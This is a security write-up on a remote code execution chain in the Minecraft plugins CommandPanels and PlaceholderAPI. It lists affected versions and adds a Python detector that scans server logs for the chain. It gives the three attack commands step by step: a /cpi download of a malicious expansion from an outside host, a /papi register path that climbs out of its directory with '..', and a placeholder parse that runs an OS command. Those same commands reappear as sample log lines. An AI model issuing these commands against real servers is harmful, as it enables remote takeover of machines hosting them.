Command Panels is a powerful Minecraft plugin that allows you to
easily create custom GUIs using simple YAML files. The problem is that
the plugin lets you download extensions from any link; combined with
other plugins, this gives attackers remote code execution (RCE).
How the exploit works
The exploit is based on using the /cpi command to download a malicious
expansion that attackers can combine with plugins such as
PlaceholderAPI or Plugman to compromise the server.
How to use the exploit with PlaceholderAPI
To perform this exploit, the CommandPanels /cpi command
must be enabled, then enter the following:
Step 1: Download the malicious extension or plugin
In this example, a malicious test extension that I created is attached.
$ /cpi rce https://mcptoolexpansionjar.mcptool.net
Step 2: Register the expansion placeholder
This lets us use the malicious extension through PlaceholderAPI.
$ /papi register ../../CommandPanels/panels/rce.yml
Step 3: Run a command on the server's operating system
Commands can now be executed remotely by calling the expansion's placeholder. Spaces in the command must be replaced with _; in this example I use a command that opens Notepad on the PC hosting the server.
$ /papi parse me %rce_notepad.exe%
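A server-side detection check added for this page (not part of CommandPanels, PlaceholderAPI or the original write-up): it scans Bukkit/Paper console lines in the "issued server command" format for the three steps above, a /cpi download from a host outside an operator allowlist, a /papi register path that climbs out of the expansions directory with .., and a parse of a placeholder belonging to an expansion registered that way. The TRUSTED_HOSTS allowlist and the log lines are constructed for the example.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Constructed sample log lines in the Bukkit/Paper "issued server command" format,
# reproducing the three-step chain described above plus one benign command.
SAMPLE_LOG = """\
[20:01:11 INFO]: Alice issued server command: /cpi rce https://mcptoolexpansionjar.mcptool.net
[20:01:30 INFO]: Alice issued server command: /papi register ../../CommandPanels/panels/rce.yml
[20:01:45 INFO]: Alice issued server command: /papi parse me %rce_notepad.exe%
[20:02:00 INFO]: Bob issued server command: /papi parse me %player_name%
"""

CMD_RE = re.compile(r"\]: (?P<player>\S+) issued server command: (?P<cmd>/\S.*)$")

# Placeholder allowlist: hosts an operator has vetted for /cpi downloads (assumed, not from the page).
TRUSTED_HOSTS = {"expansions.example.com"}


def analyze(log_text, trusted_hosts=TRUSTED_HOSTS):
    """Return (player, rule, detail) tuples for each suspicious command in the log."""
    findings = []
    sideloaded = set()  # expansion identifiers registered from outside PlaceholderAPI's own directory
    for line in log_text.splitlines():
        m = CMD_RE.search(line)
        if not m:
            continue
        player, parts = m.group("player"), m.group("cmd").split()
        if parts[0] == "/cpi":
            # Step 1: /cpi fetching a file from any URL; flag hosts not on the allowlist
            for tok in parts[1:]:
                url = urlparse(tok)
                if url.scheme in ("http", "https") and url.hostname not in trusted_hosts:
                    findings.append((player, "cpi-untrusted-download", url.hostname))
        elif parts[:2] == ["/papi", "register"] and len(parts) >= 3:
            # Step 2: /papi register with ".." escaping the expansions directory
            path = PurePosixPath(parts[2].replace("\\", "/"))
            if ".." in path.parts:
                sideloaded.add(path.stem.lower())
                findings.append((player, "papi-register-traversal", parts[2]))
        elif parts[:2] == ["/papi", "parse"]:
            # Step 3: a placeholder whose identifier matches a side-loaded expansion
            for ident, arg in re.findall(r"%([^_%]+)_([^%]+)%", " ".join(parts[2:])):
                if ident.lower() in sideloaded:
                    findings.append((player, "papi-parse-sideloaded", f"{ident}_{arg}"))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Feeding the server's latest.log through analyze() surfaces the full chain from one player in order, which is the signal to alert on rather than any single command.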
Vulnerable versions
Vulnerable versions of the CommandPanels plugin: 3.19.0.3 and below.
Vulnerable versions of the PlaceholderAPI plugin: 2.11.3 and below.
Try it yourself
You can download a server with everything you need to test the exploit
locally on your PC from this link.